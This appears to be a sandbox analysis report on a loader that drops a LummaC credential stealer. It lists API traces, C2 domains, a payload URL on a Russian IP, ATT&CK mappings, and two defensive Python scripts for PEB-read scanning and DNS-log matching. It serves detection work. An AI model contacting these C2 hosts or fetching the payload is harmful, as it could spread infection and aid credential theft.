Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_004104D3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_004104D3
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_00410666 SetUnhandledExceptionFilter, 0_2_00410666
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_0040F911 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0040F911
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_024BA63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_024BA63A
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_024A073A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_024A073A
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_0249FB78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0249FB78
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_024A08CD SetUnhandledExceptionFilter, 0_2_024A08CD

Note: the IsProcessorFeaturePresent / IsDebuggerPresent / SetUnhandledExceptionFilter / UnhandledExceptionFilter sequences (0_2_004104D3, 0_2_024A073A and the shorter variants) and the SetUnhandledExceptionFilter / UnhandledExceptionFilter / GetCurrentProcess / TerminateProcess sequence (0_2_0040F911, 0_2_0249FB78) are the Visual C++ runtime's stack-cookie (/GS) and invalid-parameter failure handlers, present in practically every MSVC-built binary; they are not by themselves evidence of deliberate anti-debugging. The fs:[30h] reads are the entries worth reviewing by hand: the ones at 3_2_0249092B and 3_2_02490D90 fall inside the 0x02490000 region of process 3 that the LummaC Yara rules match further down, so they belong to the payload rather than to runtime code.
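The PEB-read entries above are found by pattern-matching instruction bytes, and the same check is useful on a memory dump taken outside the sandbox. The script below is an added example, not code from the report or the sample: it scans raw code bytes (an unpacked .text section or one of the .sdmp regions listed in this report) for the two encodings the report lists, `mov eax, dword ptr fs:[30h]` and `push dword ptr fs:[30h]`, plus the other `mov r32, fs:[30h]` encodings and the x64 equivalent `mov rax, gs:[60h]`, and reports each hit at the base address the caller supplies. The bytes it scans in `demo()` are constructed for the example, not taken from the sample.

```python
"""Static scan for PEB-pointer reads in an x86/x64 code dump (added example, not from the report)."""
import re

_REG32 = ("eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi")

# Instruction encodings (Intel SDM). 0x64 is the FS segment override, 0x65 the GS override;
# TEB+0x30 holds the PEB pointer on 32-bit Windows, TEB+0x60 on 64-bit Windows.
_PATTERNS = (
    # 64 A1 30 00 00 00          mov eax, fs:[30h]        (MOV EAX, moffs32)
    (re.compile(rb"\x64\xA1\x30\x00\x00\x00"),
     lambda m: "mov eax, dword ptr fs:[00000030h]"),
    # 64 8B /r 30 00 00 00       mov r32, fs:[30h]        (ModRM mod=00, rm=101 = disp32; reg field picks the register)
    (re.compile(rb"\x64\x8B([\x05\x0D\x15\x1D\x25\x2D\x35\x3D])\x30\x00\x00\x00"),
     lambda m: f"mov {_REG32[(m.group(1)[0] >> 3) & 7]}, dword ptr fs:[00000030h]"),
    # 64 FF 35 30 00 00 00       push dword ptr fs:[30h]  (PUSH r/m32 = FF /6)
    (re.compile(rb"\x64\xFF\x35\x30\x00\x00\x00"),
     lambda m: "push dword ptr fs:[00000030h]"),
    # 65 48 8B 04 25 60 00 00 00 mov rax, gs:[60h]        (x64; SIB form with no base and no index)
    (re.compile(rb"\x65\x48\x8B\x04\x25\x60\x00\x00\x00"),
     lambda m: "mov rax, qword ptr gs:[0000000000000060h]"),
)


def find_peb_reads(code: bytes, base: int = 0) -> list:
    """Return sorted (address, disassembly) pairs for every PEB-pointer read found in `code`."""
    hits = []
    for pattern, render in _PATTERNS:
        for m in pattern.finditer(code):
            hits.append((base + m.start(), render(m)))
    return sorted(hits)


# Constructed test bytes (not from the sample): a tiny function that reads the PEB three different ways.
SAMPLE_CODE = (
    b"\x55\x8B\xEC"                   # push ebp; mov ebp, esp
    b"\x64\xA1\x30\x00\x00\x00"       # mov eax, fs:[30h]
    b"\x8B\x40\x0C"                   # mov eax, [eax+0Ch]   (PEB->Ldr, a typical follow-up)
    b"\x64\xFF\x35\x30\x00\x00\x00"   # push dword ptr fs:[30h]
    b"\x90"                           # nop
    b"\x64\x8B\x0D\x30\x00\x00\x00"   # mov ecx, fs:[30h]
    b"\xC3"                           # ret
)
SAMPLE_BASE = 0x00400000


def demo() -> list:
    """Scan the constructed function as if it had been dumped from image base 0x00400000."""
    return find_peb_reads(SAMPLE_CODE, SAMPLE_BASE)


if __name__ == "__main__":
    for addr, text in demo():  # for a real dump: find_peb_reads(open(path, "rb").read(), base)
        print(f"{addr:08X}  {text}")
```

A hit only says that the PEB pointer is loaded; what follows decides whether it is an anti-debug check (BeingDebugged at PEB+2, NtGlobalFlag at PEB+0x68), a manual import resolver walking PEB->Ldr, or harmless runtime code, so each address still needs a look in a disassembler.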

HIPS / PFW / Operating System Protection Evasion

Source: 91B1.tmp.exe | String found in binary or memory: debonairnukk.xyz
Source: 91B1.tmp.exe | String found in binary or memory: diffuculttan.xyz
Source: 91B1.tmp.exe | String found in binary or memory: effecterectz.xyz
Source: 91B1.tmp.exe | String found in binary or memory: deafeninggeh.biz
Source: 91B1.tmp.exe | String found in binary or memory: immureprech.biz
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Process created: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe "C:\Users\user\AppData\Local\Temp\91B1.tmp.exe"
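The five domains above are the actionable indicators from this section: they are embedded in 91B1.tmp.exe and, per the report's signature list, resolved during the run. The script below is an added example, not part of the report: it matches DNS telemetry against that list on label boundaries, so that `cdn.immureprech.biz` is a hit while a look-alike such as `notdebonairnukk.xyz` is not, and records whether the query actually resolved (QueryStatus 0) or failed (for example 9003, NXDOMAIN). The log lines are constructed in the style of Sysmon Event ID 22 (DnsQuery) records and are not real telemetry.

```python
"""Match DNS query records against the C2 domains extracted from 91B1.tmp.exe (added example, not from the report)."""
import re
from typing import Optional

# The five domains the report found in 91B1.tmp.exe.
C2_DOMAINS = frozenset({
    "debonairnukk.xyz",
    "diffuculttan.xyz",
    "effecterectz.xyz",
    "deafeninggeh.biz",
    "immureprech.biz",
})

# Constructed sample records: "<utc time> <host> Image=<process> QueryName=<name> QueryStatus=<rc>"
SAMPLE_LOG = r"""2024-12-17T10:01:03Z ws01 Image=C:\Users\user\AppData\Local\Temp\91B1.tmp.exe QueryName=debonairnukk.xyz QueryStatus=0
2024-12-17T10:01:05Z ws01 Image=C:\Program Files\Mozilla Firefox\firefox.exe QueryName=www.mozilla.org QueryStatus=0
2024-12-17T10:01:09Z ws01 Image=C:\Users\user\AppData\Local\Temp\91B1.tmp.exe QueryName=cdn.immureprech.biz. QueryStatus=9003
2024-12-17T10:01:11Z ws01 Image=C:\Windows\System32\svchost.exe QueryName=notdebonairnukk.xyz QueryStatus=0
"""

_RECORD = re.compile(
    r"^(?P<ts>\S+)\s+(?P<host>\S+)\s+Image=(?P<image>.+?)\s+QueryName=(?P<qname>\S+)\s+QueryStatus=(?P<rc>\d+)$"
)


def normalize(qname: str) -> str:
    """Lower-case and drop the trailing dot of a fully qualified name."""
    return qname.rstrip(".").lower()


def matching_ioc(qname: str, iocs=C2_DOMAINS) -> Optional[str]:
    """Return the IOC that `qname` equals or is a subdomain of, else None (no bare substring matches)."""
    name = normalize(qname)
    for ioc in iocs:
        if name == ioc or name.endswith("." + ioc):
            return ioc
    return None


def scan_dns_log(text: str, iocs=C2_DOMAINS) -> list:
    """Parse records and return one dict per query that hits an IOC, in log order."""
    hits = []
    for line in text.splitlines():
        m = _RECORD.match(line)
        if not m:
            continue  # not a DnsQuery record (or a malformed line): skip rather than fail
        ioc = matching_ioc(m["qname"], iocs)
        if ioc is None:
            continue
        hits.append({
            "ts": m["ts"],
            "host": m["host"],
            "image": m["image"],
            "qname": normalize(m["qname"]),
            "ioc": ioc,
            "resolved": m["rc"] == "0",  # 0 = success; any other status means the lookup failed
        })
    return hits


if __name__ == "__main__":
    for h in scan_dns_log(SAMPLE_LOG):
        print(f"{h['ts']} {h['host']} {h['image']} -> {h['qname']} (ioc={h['ioc']}, resolved={h['resolved']})")
```

A failed lookup of a C2 domain is still a confirmed execution of the payload on that host; it only tells you the infrastructure was down or sinkholed at the time, which matters for the next step (credential reset scope) but not for the verdict.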
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_0041077B cpuid 0_2_0041077B
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 0_2_0043B00A
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: GetLocaleInfoW, 0_2_004351C0
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: EnumSystemLocalesW, 0_2_0043B2CD
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: EnumSystemLocalesW, 0_2_0043B282
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: EnumSystemLocalesW, 0_2_0043B368
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_0043B3F5
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: GetLocaleInfoW, 0_2_0043B645
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_0043B76E
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: GetLocaleInfoW, 0_2_0043B875
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_0043B942
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: EnumSystemLocalesW, 0_2_00434DCD
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 0_2_024CB271
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: EnumSystemLocalesW, 0_2_024C5034
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: GetLocaleInfoW, 0_2_024C5427
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: EnumSystemLocalesW, 0_2_024CB4E9
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: EnumSystemLocalesW, 0_2_024CB534
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: EnumSystemLocalesW, 0_2_024CB5CF
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: GetLocaleInfoW, 0_2_024CBADC
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_024CBBA9
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: GetLocaleInfoW, 0_2_024CB8AC
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: GetLocaleInfoW, 0_2_024CB8A3
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_024CB9D5
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_004103CD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_004103CD
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_004163EA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8, 0_2_004163EA
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.7.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr | Binary or memory string: MsMpEng.exe

Note: the locale functions (GetLocaleInfoW, EnumSystemLocalesW, IsValidCodePage, GetUserDefaultLCID, with the _wcschr/GetACP sequences) are the MSVC runtime's setlocale support, the cpuid at 0_2_0041077B its CPU-feature initialisation, and the GetSystemTimeAsFileTime / GetCurrentThreadId / GetCurrentProcessId / QueryPerformanceCounter sequence at 0_2_004103CD its stack-cookie seeding; all are present in ordinary MSVC-built programs. The MachineGuid read by the dropped executable is the finding that matters here: it is a stable per-installation value and is the usual source of a victim or hardware identifier sent to the C2. The MsMpEng.exe strings come from Amcache.hve.7.dr, the analysis VM's own application-compatibility hive, where Windows Defender is listed because it is installed in the VM, not because the sample references it.

Stealing of Sensitive Information

Source: Yara match | File source: 3.2.91B1.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.91B1.tmp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.91B1.tmp.exe.24e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.91B1.tmp.exe.24e0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1390576306.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR

Note: every match is in the dropped 91B1.tmp.exe (process 3): its unpacked image at 0x400000, the two mapped regions at 0x24E0000 and 0x2490000, and the decrypted TLS capture (sslproxydump.pcap), so the LummaC rules fire on the C2 traffic as well as on the code. The loader hpEAJnNwCB.exe (process 0) matches nothing.

Remote Access Functionality

Source: Yara match | File source: 3.2.91B1.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.91B1.tmp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.91B1.tmp.exe.24e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.91B1.tmp.exe.24e0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1390576306.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_004218CC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext, 0_2_004218CC
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_00420BF6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 0_2_00420BF6
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_024B1B33 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext, 0_2_024B1B33
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_024B0E5D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 0_2_024B0E5D

Note: the Concurrency::details::* functions are the Visual C++ Concurrency Runtime (ConcRT) scheduler, statically linked into hpEAJnNwCB.exe; they schedule threads within the process and are not remote-access code. The remote-access classification in this section rests on the Yara matches above, all of which are on the dropped 91B1.tmp.exe.
MITRE ATT&CK Matrix (one line per tactic column; cells are listed top to bottom, and a number in parentheses is the count of matching signatures for that technique):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Native API (2); PowerShell (1); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (1); Process Injection (11); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (4); Software Packing (22); DLL Side-Loading (1); Indicator Removal from Tools
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: System Time Discovery (1); Query Registry (1); Security Software Discovery (31); Virtualization/Sandbox Evasion (1); Process Discovery (1); Application Window Discovery (1); File and Directory Discovery (2); System Information Discovery (24)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Screen Capture (1); Archive Collected Data (1); Clipboard Data (3); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Encrypted Channel (11); Ingress Tool Transfer (12); Non-Application Layer Protocol (3); Application Layer Protocol (124); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
Behavior Graph (ID 1576575; sample hpEAJnNwCB.exe; start date 17/12/2024; architecture WINDOWS; score 100)

Start
  DNS/IP: effecterectz.xyz; diffuculttan.xyz; 8 other IPs or domains
  Signatures: Multi AV Scanner detection for domain / URL; Suricata IDS alerts for network traffic; Found malware configuration; 10 other signatures
  Signature attached to diffuculttan.xyz: Performs DNS queries to domains with low reputation
  Started process: hpEAJnNwCB.exe (1 created registry value, 17 created files)

hpEAJnNwCB.exe
  DNS/IP: 176.113.115.19 (ports 49715, 80; SELECTELRU, Russian Federation); post-to-me.com 104.21.56.70 (ports 443, 49709; CLOUDFLARENETUS, United States)
  Dropped files: C:\Users\user\AppData\Local\...\91B1.tmp.exe (PE32); C:\Users\user\...\ScreenUpdateSync[1].exe (PE32)
  Signatures: Detected unpacking (overwrites its own PE header)
  Started process: 91B1.tmp.exe

91B1.tmp.exe
  DNS/IP: deafeninggeh.biz 104.131.68.180 (ports 443, 49748; DIGITALOCEAN-ASNUS, United States); immureprech.biz 45.77.249.79 (ports 443, 49736; AS-CHOOPAUS, United States); steamcommunity.com 104.121.10.34 (ports 443, 49756; AKAMAI-ASUS, United States)
  Signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Machine Learning detection for dropped file
  Started process: WerFault.exe (19 created registry values, 16 created files)

WerFault.exe
  Dropped files: C:\ProgramData\Microsoft\...\Report.wer (Unicode)

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


Source | Detection | Scanner | Label
hpEAJnNwCB.exe | 40% | Virustotal |
hpEAJnNwCB.exe | 45% | ReversingLabs |
hpEAJnNwCB.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\ScreenUpdateSync[1].exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | 100% | Joe Sandbox ML |
                  No Antivirus matches
                  No Antivirus matches
Source | Detection | Scanner | Label
https://effecterectz.xyz/apim | 100% | Avira URL Cloud | malware
https://effecterectz.xyz/0g | 100% | Avira URL Cloud | malware
https://post-to-me.com/track_prt.php?sub=0&cc=DE~ | 100% | Avira URL Cloud | malware
https://deafeninggeh.biz/apiV | 100% | Avira URL Cloud | malware
http://176.113.115.19/ | 0% | Avira URL Cloud | safe
http://176.113.115.19/ScreenUpdateSync.exey0 | 0% | Avira URL Cloud | safe
https://effecterectz.xyz/apim | 18% | Virustotal |
http://176.113.115.19/$0 | 0% | Avira URL Cloud | safe
http://176.113.115.19/ScreenUpdateSync.exeWX | 0% | Avira URL Cloud | safe
https://post-to-me.com/track_prt.php?sub=0&cc=DE6 | 100% | Avira URL Cloud | malware
http://176.113.115.19/ScreenUpdateSync.exel0 | 0% | Avira URL Cloud | safe
https://effecterectz.xyz/P | 100% | Avira URL Cloud | malware
https://effecterectz.x | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
post-to-me.com | 104.21.56.70 | true | false | | high
steamcommunity.com | 104.121.10.34 | true | false | | high
immureprech.biz | 45.77.249.79 | true | false | | high
deafeninggeh.biz | 104.131.68.180 | true | false | | high
sordid-snaked.cyou | unknown | unknown | false | | high
diffuculttan.xyz | unknown | unknown | false | | high
effecterectz.xyz | unknown | unknown | false | | high
awake-weaves.cyou | unknown | unknown | false | | high
wrathful-jammy.cyou | unknown | unknown | false | | high
debonairnukk.xyz | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
sordid-snaked.cyou | false | | high
deafeninggeh.biz | false | | high
effecterectz.xyz | false | | high
wrathful-jammy.cyou | false | | high
https://steamcommunity.com/profiles/76561199724331900 | false | | high
awake-weaves.cyou | false | | high
immureprech.biz | false | | high
https://immureprech.biz/api | false | | high
debonairnukk.xyz | false | | high
diffuculttan.xyz | false | | high
https://post-to-me.com/track_prt.php?sub=0&cc=DE | false | | high
https://deafeninggeh.biz/api | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://player.vimeo.com | 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://immureprech.biz/ | 91B1.tmp.exe, 00000003.00000003.1471571879.0000000000949000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://effecterectz.xyz/0g | 91B1.tmp.exe, 00000003.00000003.1471777878.000000000097A000.00000004.00000020.00020000.00000000.sdmp; 91B1.tmp.exe, 00000003.00000003.1471854297.0000000000982000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://steamcommunity.com/?subsection=broadcasts | 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://store.steampowered.com/points/shopr | 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://store.steampowered.com/subscriber_agreement/ | 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.gstatic.cn/recaptcha/ | 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://176.113.115.19/ScreenUpdateSync.exe | hpEAJnNwCB.exe, 00000000.00000003.1362746169.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp; hpEAJnNwCB.exe, 00000000.00000002.3745614627.0000000000B80000.00000004.00000020.00020000.00000000.sdmp; hpEAJnNwCB.exe, 00000000.00000003.3613315762.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.valvesoftware.com/legal.htm | 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en | 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://effecterectz.xyz/apim | 91B1.tmp.exe, 00000003.00000003.1471777878.000000000097A000.00000004.00000020.00020000.00000000.sdmp; 91B1.tmp.exe, 00000003.00000003.1471854297.0000000000982000.00000004.00000020.00020000.00000000.sdmp | false | 18%, Virustotal; Avira URL Cloud: malware | unknown
https://www.youtube.com | 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com | 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | 91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp; 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | 91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp; 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ | 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl | 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79WC7T | 91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp; 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC | 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://diffuculttan.xyz/api | 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://s.ytimg.com; | 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1 | 91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp; 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english& | 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://deafeninggeh.biz/apiV | 91B1.tmp.exe, 00000003.00000003.1471777878.000000000097A000.00000004.00000020.00020000.00000000.sdmp; 91B1.tmp.exe, 00000003.00000003.1471854297.0000000000982000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://176.113.115.19/ | hpEAJnNwCB.exe, 00000000.00000003.1362746169.0000000000BAC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://community.fastly.steamstatic.com/ | 91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/css/skin_1/fatalerror.css?v=OFUqlcDNiD6y&l=engli | 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmp | false | | high
